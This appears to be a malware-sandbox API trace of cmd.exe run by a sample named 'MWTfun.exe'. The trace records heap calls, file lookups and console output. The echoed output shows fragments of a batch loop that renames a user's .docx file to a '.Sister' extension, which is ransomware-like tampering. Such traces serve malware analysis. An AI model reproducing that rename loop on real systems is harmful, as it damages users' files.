returned 0x21ed8d5e680 [0306.056] GetProcessHeap () returned 0x21ed8c70000 [0306.056] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d5e680, Size=0x130) returned 0x21ed8d2c910 [0306.056] GetProcessHeap () returned 0x21ed8c70000 [0306.056] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d2c910) returned 0x130 [0306.056] malloc (_Size=0xffce) returned 0x21eda31fbc0 [0306.056] ??_V@YAXPEAX@Z () returned 0x21eda31fbc0 [0306.056] GetProcessHeap () returned 0x21ed8c70000 [0306.056] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8d65fb0 [0306.056] GetProcessHeap () returned 0x21ed8c70000 [0306.056] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed93737f0 [0306.056] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0306.056] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0306.056] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0306.056] GetLastError () returned 0x2 [0306.056] GetProcessHeap () returned 0x21ed8c70000 [0306.056] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed9446ff0 [0306.057] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed9447000 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents") returned 0x19 [0306.057] SetErrorMode (uMode=0x0) returned 0x0 [0306.057] SetErrorMode (uMode=0x1) returned 0x0 [0306.057] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", nBufferLength=0x7fe7, lpBuffer=0x21eda31fbc0, lpFilePart=0xa6cf4fd230 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", lpFilePart=0xa6cf4fd230*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister") returned 0x54 [0306.057] SetErrorMode (uMode=0x0) returned 0x1 [0306.057] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0306.057] GetProcessHeap () returned 0x21ed8c70000 [0306.057] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed9373cd0 [0306.057] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0306.057] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0306.057] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0306.058] GetLastError () returned 0x2 [0306.058] ??_V@YAXPEAX@Z () returned 0x1 [0306.058] malloc (_Size=0xffce) returned 0x21eda31fbc0 [0306.058] ??_V@YAXPEAX@Z () returned 0x21eda31fbc0 [0306.058] malloc (_Size=0xffce) returned 0x21eda32fba0 [0306.058] ??_V@YAXPEAX@Z () returned 0x21eda32fba0 [0306.058] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0306.058] GetLastError () returned 0x2 [0306.058] _get_osfhandle (_FileHandle=2) returned 0x54 [0306.058] GetFileType (hFile=0x54) returned 0x2 [0306.058] GetStdHandle (nStdHandle=0xfffffff4) returned 0x54 [0306.058] GetConsoleMode (in: hConsoleHandle=0x54, lpMode=0xa6cf4fd378 | out: lpMode=0xa6cf4fd378) returned 1 [0306.059] _get_osfhandle (_FileHandle=2) returned 0x54 [0306.059] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x54, lpConsoleScreenBufferInfo=0xa6cf4fd3b0 | out: lpConsoleScreenBufferInfo=0xa6cf4fd3b0) returned 1 [0306.059] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0306.059] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0xa6cf4fd450 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0306.060] WriteConsoleW (in: hConsoleOutput=0x54, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0xa6cf4fd3a0, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fd3a0*=0x2c) returned 1 [0306.066] longjmp () [0306.066] ??_V@YAXPEAX@Z () returned 0x1 [0306.067] FindNextFileW (in: hFindFile=0x21ed8c7cf40, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x784c31f0, ftCreationTime.dwHighDateTime=0x1d58d05, ftLastAccessTime.dwLowDateTime=0xb19262a0, ftLastAccessTime.dwHighDateTime=0x1d5a203, ftLastWriteTime.dwLowDateTime=0xb19262a0, ftLastWriteTime.dwHighDateTime=0x1d5a203, nFileSizeHigh=0x0, nFileSizeLow=0xcc54, dwReserved0=0xa0000003, dwReserved1=0xe68ac9ea, cFileName="xg3xDIcF-yOyIIxp1s8.docx", cAlternateFileName="")) returned 1 [0306.067] GetProcessHeap () returned 0x21ed8c70000 [0306.067] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c758a0, Size=0x2be) returned 0x21ed8c758a0 [0306.067] GetProcessHeap () returned 0x21ed8c70000 [0306.067] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c758a0) returned 0x2be [0306.067] GetProcessHeap () returned 0x21ed8c70000 [0306.067] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9456fe0 [0306.067] GetProcessHeap () returned 0x21ed8c70000 [0306.067] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9456fe0, Size=0x30) returned 0x21ed9456fe0 [0306.067] GetProcessHeap () returned 0x21ed8c70000 [0306.067] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9456fe0) returned 0x30 [0306.068] GetProcessHeap () returned 0x21ed8c70000 [0306.068] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9457020 [0306.068] malloc (_Size=0x1ff9c) returned 0x21ed993f900 [0306.068] GetProcessHeap () returned 0x21ed8c70000 [0306.068] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x42) returned 0x21ed8c7ba30 [0306.068] ??_V@YAXPEAX@Z () returned 0x1 [0306.068] GetProcessHeap () returned 0x21ed8c70000 [0306.068] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9457020, Size=0x200) returned 0x21ed9457020 [0306.068] GetProcessHeap () returned 0x21ed8c70000 [0306.068] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9457020) returned 0x200 [0306.068] GetProcessHeap () returned 0x21ed8c70000 [0306.068] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9457230 [0306.068] GetProcessHeap () returned 0x21ed8c70000 [0306.068] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9457230, Size=0x290) returned 0x21ed9457230 [0306.069] GetProcessHeap () returned 0x21ed8c70000 [0306.069] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9457230) returned 0x290 [0306.069] GetProcessHeap () returned 0x21ed8c70000 [0306.069] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed94574d0 [0306.069] GetProcessHeap () returned 0x21ed8c70000 [0306.069] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed94574d0, Size=0x30) returned 0x21ed94574d0 [0306.069] GetProcessHeap () returned 0x21ed8c70000 [0306.069] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed94574d0) returned 0x30 [0306.069] GetProcessHeap () returned 0x21ed8c70000 [0306.069] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9457510 [0306.069] malloc (_Size=0x1ff9c) returned 0x21ed993f900 [0306.069] GetProcessHeap () returned 0x21ed8c70000 [0306.069] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x42) returned 0x21ed8c7bd00 [0306.069] ??_V@YAXPEAX@Z () returned 0x1 [0306.069] malloc (_Size=0x1ff9c) returned 0x21ed993f900 [0306.070] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x7, cFileName="Users", cAlternateFileName="")) returned 0x21ed8d65590 [0306.070] FindClose (in: hFindFile=0x21ed8d65590 | out: hFindFile=0x21ed8d65590) returned 1 [0306.070] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x7, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8d66250 [0306.070] FindClose (in: hFindFile=0x21ed8d66250 | out: hFindFile=0x21ed8d66250) returned 1 [0306.071] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xe102090e, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xe102090e, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x7, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 0x21ed8d65ad0 [0306.071] FindClose (in: hFindFile=0x21ed8d65ad0 | out: hFindFile=0x21ed8d65ad0) returned 1 [0306.072] _wcsnicmp (_String1="DOCUME~1", _String2="Documents", _MaxCount=0x9) returned 16 [0306.072] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\xg3xDIcF-yOyIIxp1s8.docx", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x784c31f0, ftCreationTime.dwHighDateTime=0x1d58d05, ftLastAccessTime.dwLowDateTime=0xb19262a0, ftLastAccessTime.dwHighDateTime=0x1d5a203, ftLastWriteTime.dwLowDateTime=0xb19262a0, ftLastWriteTime.dwHighDateTime=0x1d5a203, nFileSizeHigh=0x0, nFileSizeLow=0xcc54, dwReserved0=0x4, dwReserved1=0x7, cFileName="xg3xDIcF-yOyIIxp1s8.docx", cAlternateFileName="XG3XDI~1.DOC")) returned 0x21ed8d65dd0 [0306.072] FindClose (in: hFindFile=0x21ed8d65dd0 | out: hFindFile=0x21ed8d65dd0) returned 1 [0306.072] _wcsnicmp (_String1="XG3XDI~1.DOC", _String2="xg3xDIcF-yOyIIxp1s8.docx", _MaxCount=0x18) returned 27 [0306.072] malloc (_Size=0x1ff9c) returned 0x21eda33fb80 [0306.073] ??_V@YAXPEAX@Z () returned 0x21eda33fb80 [0306.074] GetProcessHeap () returned 0x21ed8c70000 [0306.074] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x38) returned 0x21ed8cc8890 [0306.074] ??_V@YAXPEAX@Z () returned 0x1 [0306.074] ??_V@YAXPEAX@Z () returned 0x1 [0306.074] GetProcessHeap () returned 0x21ed8c70000 [0306.075] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9457510, Size=0x1f8) returned 0x21ed9457510 [0306.075] GetProcessHeap () returned 0x21ed8c70000 [0306.075] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9457510) returned 0x1f8 [0306.075] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0306.075] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.075] GetFileType (hFile=0x50) returned 0x2 [0306.075] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0306.075] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0306.075] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.075] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0306.082] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents") returned 0x19 [0306.082] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Documents") returned 25 [0306.083] _vsnwprintf (in: _Buffer=0x21ed8e80192, _BufferCount=0x83cc, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0306.083] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.083] GetFileType (hFile=0x50) returned 0x2 [0306.083] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0306.083] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0306.083] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.083] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x1a) returned 1 [0306.084] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.084] GetFileType (hFile=0x50) returned 0x2 [0306.084] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0306.084] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0306.084] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.084] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed9456ff0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed9456ff0*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0306.085] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"xg3xDIcF-yOyIIxp1s8.docx\" \"xg3xDIcF-yOyIIxp1s8.docx.Sister\" ") returned 62 [0306.085] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.085] GetFileType (hFile=0x50) returned 0x2 [0306.085] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0306.085] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0306.085] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.085] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3e, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x3e) returned 1 [0306.086] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe558 | out: _Buffer=" & ") returned 3 [0306.086] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.086] GetFileType (hFile=0x50) returned 0x2 [0306.086] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0306.086] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0306.086] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.086] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0306.087] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%.3s", _ArgList=0xa6cf4fe528 | out: _Buffer="for") returned 3 [0306.087] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.087] GetFileType (hFile=0x50) returned 0x2 [0306.087] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0306.087] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0306.088] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.088] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x3) returned 1 [0306.089] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" %a in ") returned 7 [0306.089] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.089] GetFileType (hFile=0x50) returned 0x2 [0306.089] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0306.089] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0306.089] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.089] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x7) returned 1 [0306.090] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="(%s) %s ", _ArgList=0xa6cf4fe528 | out: _Buffer="(\"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe\") do ") returned 85 [0306.090] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.090] GetFileType (hFile=0x50) returned 0x2 [0306.090] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0306.090] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0306.091] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.091] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x55, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x55) returned 1 [0306.146] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.146] GetFileType (hFile=0x50) returned 0x2 [0306.147] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0306.147] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0306.147] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.147] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed94574e0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed94574e0*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0306.148] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"xg3xDIcF-yOyIIxp1s8.docx.Sister\" \"xg3xDIcF-yOyIIxp1s8.bat\" ") returned 61 [0306.148] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.148] GetFileType (hFile=0x50) returned 0x2 [0306.148] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0306.148] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0306.148] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.148] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3d, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x3d) returned 1 [0306.154] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0306.154] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.154] GetFileType (hFile=0x50) returned 0x2 [0306.154] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0306.154] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0306.155] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.155] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0306.161] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe240, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0306.161] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0306.161] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0306.161] malloc (_Size=0xffce) returned 0x21eda33fb80 [0306.161] ??_V@YAXPEAX@Z () returned 0x21eda33fb80 [0306.161] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0306.161] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0306.161] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0306.161] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0306.161] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0306.161] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0306.161] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0306.162] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0306.162] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0306.162] ??_V@YAXPEAX@Z () returned 0x1 [0306.162] GetProcessHeap () returned 0x21ed8c70000 [0306.162] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x108) returned 0x21ed8d6bea0 [0306.162] GetProcessHeap () returned 0x21ed8c70000 [0306.162] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d6bea0, Size=0x8c) returned 0x21ed8d6bea0 [0306.162] GetProcessHeap () returned 0x21ed8c70000 [0306.162] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d6bea0) returned 0x8c [0306.162] GetProcessHeap () returned 0x21ed8c70000 [0306.162] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x94) returned 0x21ed8d447c0 [0306.162] GetProcessHeap () returned 0x21ed8c70000 [0306.162] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x108) returned 0x21ed8d6bf40 [0306.162] GetProcessHeap () returned 0x21ed8c70000 [0306.162] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d6bf40, Size=0x8c) returned 0x21ed8d6bf40 [0306.162] GetProcessHeap () returned 0x21ed8c70000 [0306.162] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d6bf40) returned 0x8c [0306.162] malloc (_Size=0xffce) returned 0x21eda33fb80 [0306.162] ??_V@YAXPEAX@Z () returned 0x21eda33fb80 [0306.162] GetProcessHeap () returned 0x21ed8c70000 [0306.164] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8d65dd0 [0306.164] GetProcessHeap () returned 0x21ed8c70000 [0306.164] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed9370c10 [0306.164] _wcsicmp (_String1="xg3xDIcF-yOyIIxp1s8.docx", _String2=".") returned 74 [0306.165] _wcsicmp (_String1="xg3xDIcF-yOyIIxp1s8.docx", _String2="..") returned 74 [0306.165] GetFileAttributesW (lpFileName="xg3xDIcF-yOyIIxp1s8.docx" (normalized: "c:\\users\\fd1hvy\\documents\\xg3xdicf-yoyiixp1s8.docx")) returned 0x20 [0306.165] GetProcessHeap () returned 0x21ed8c70000 [0306.165] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed9457720 [0306.166] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed9457730 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents") returned 0x19 [0306.167] SetErrorMode (uMode=0x0) returned 0x0 [0306.167] SetErrorMode (uMode=0x1) returned 0x0 [0306.167] GetFullPathNameW (in: lpFileName="xg3xDIcF-yOyIIxp1s8.docx", nBufferLength=0x7fe7, lpBuffer=0x21eda33fb80, lpFilePart=0xa6cf4fd660 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\xg3xDIcF-yOyIIxp1s8.docx", lpFilePart=0xa6cf4fd660*="xg3xDIcF-yOyIIxp1s8.docx") returned 0x32 [0306.167] SetErrorMode (uMode=0x0) returned 0x1 [0306.167] GetProcessHeap () returned 0x21ed8c70000 [0306.167] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed93710f0 [0306.167] _wcsicmp (_String1="xg3xDIcF-yOyIIxp1s8.docx", _String2=".") returned 74 [0306.167] _wcsicmp (_String1="xg3xDIcF-yOyIIxp1s8.docx", _String2="..") returned 74 [0306.167] GetFileAttributesW (lpFileName="xg3xDIcF-yOyIIxp1s8.docx" (normalized: "c:\\users\\fd1hvy\\documents\\xg3xdicf-yoyiixp1s8.docx")) returned 0x20 [0306.167] ??_V@YAXPEAX@Z () returned 0x1 [0306.167] malloc (_Size=0xffce) returned 0x21eda33fb80 [0306.167] ??_V@YAXPEAX@Z () returned 0x21eda33fb80 [0306.167] malloc (_Size=0xffce) returned 0x21eda34fb60 [0306.167] 